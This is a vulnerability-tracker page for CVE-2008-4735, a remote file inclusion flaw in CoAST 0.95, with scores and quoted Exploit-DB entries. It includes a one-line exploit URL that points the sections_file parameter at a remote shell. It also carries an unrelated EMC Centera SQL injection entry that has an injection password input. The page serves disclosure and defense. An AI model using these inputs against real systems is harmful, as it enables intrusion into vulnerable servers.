CVE-2008-4735
published 2008-10-24CVE-2008-4735: PHP remote file inclusion vulnerability in header.php in Concord Asset, Software, and Ticket system (CoAST) 0.95 allows remote attackers to execute arbitrary…
PriorityP346high8.5CVSS 2.0
AVNACMAuSCCICAC
EXPLOIT
EPSS
2.33%
81.4th percentile
PHP remote file inclusion vulnerability in header.php in Concord Asset, Software, and Ticket system (CoAST) 0.95 allows remote attackers to execute arbitrary PHP code via a URL in the sections_file parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| coastal | coast | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
CoAST 0.95 - 'sections_file' Remote File Inclusion
exploitdb·2008-09-27
CVE-2008-4735 CoAST 0.95 - 'sections_file' Remote File Inclusion
CoAST 0.95 - 'sections_file' Remote File Inclusion
---
Author : By DaRkLiFe
Greetz : str0ke & S.VV.A.T.
Script : The Concord Asset, Software, and Ticket system(CoAST) 0.95 Remote File Inclusion Vulnerability
Download :http://downloads.sourceforge.net/coastal/coast-0.95.tgz?modtime=1222363198&big_mirror=0
Exploit : Site.com/script_path/coast/header.php?sections_file=Shellz?
The header.php.dist file exists and it has to be renamed into header.php as given in instructions.
Vulberable : line 201 :
THANKS ! GREETZ !
# milw0rm.com [2008-09-27]
Exploit-DB
EMC Centera Universal Access 4.0_4735.p4 - 'Username' SQL Injection
exploitdb·2008-07-23
CVE-2008-3370 EMC Centera Universal Access 4.0_4735.p4 - 'Username' SQL Injection
EMC Centera Universal Access 4.0_4735.p4 - 'Username' SQL Injection
---
source: https://www.securityfocus.com/bid/30358/info
EMC Centera Universal Access (CUA) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CUA 4.0_4735.p4 is vulnerable; other versions may also be affected.
Username: valid_user_name
Password: --
No writeups or analysis indexed.
2008-10-24
Published